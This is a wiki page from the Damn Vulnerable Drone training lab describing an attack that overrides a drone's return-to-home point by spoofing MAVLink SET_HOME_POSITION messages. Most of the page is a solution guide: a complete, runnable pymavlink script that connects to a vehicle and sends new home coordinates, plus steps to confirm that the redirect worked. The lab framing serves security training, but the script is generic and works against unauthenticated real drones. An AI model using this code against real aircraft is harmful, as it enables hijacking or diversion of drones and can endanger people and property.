Return to Home Point Override - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki
Override the Return to Home (RTH) point of the drone using pymavlink.
Damn Vulnerable Drone > Attack Scenarios > Injection > Change Return to Home Point
Changing the Return to Home (RTH) point of a drone involves sending the SET_HOME_POSITION command to update the coordinates used by the drone when executing Return-to-Launch (RTL) or failsafe behaviors. If an attacker can spoof this command while the drone is armed or flying, it can silently redirect the RTH behavior to an unintended location — for example, an attacker-controlled landing zone.
This injection attack targets the drone’s internal navigation logic rather than external telemetry, making it a particularly stealthy method to influence mission outcome.
⚠️ Solution Guide
pip install pymavlink
Save the following as set_home_override.py and replace the target coordinates/IP with your own.
from pymavlink import mavutil
# Replace with your connection string (e.g., tcp:10.13.0.3:5760)
connection_string = 'udp:127.0.0.1:14550'
# Connect to the vehicle
master = mavutil.mavlink_connection(connection_string)
master.wait_heartbeat()
print("[+] Connected to drone")
# Define the new home position (latitude, longitude, altitude)
latitude = -35.363261 # Degrees
longitude = 149.165230 # Degrees
altitude = 584 # Meters
# Convert to MAVLink-compatible format
lat = int(latitude * 1e7)
lon = int(longitude * 1e7)
alt = int(altitude * 1000) # mm
# Send SET_HOME_POSITION command
master.mav.set_home_position_send(
target_system=master.target_system,
latitude=lat,
longitude=lon,
altitude=alt,
x=0, y=0, z=0, # Not used
q=[0, 0, 0, 0], # Orientation (ignored)
approach_x=0,
approach_y=0,
approach_z=0
)
print(f"[!] New home set: lat={latitude}, lon={longitude}, alt={altitude}m")
sudo python3 set_home_override.py- Use
RTLin QGroundControl and watch the drone’s new home heading - Check
HOME_POSITIONmessages in MAVProxy:status textorparam show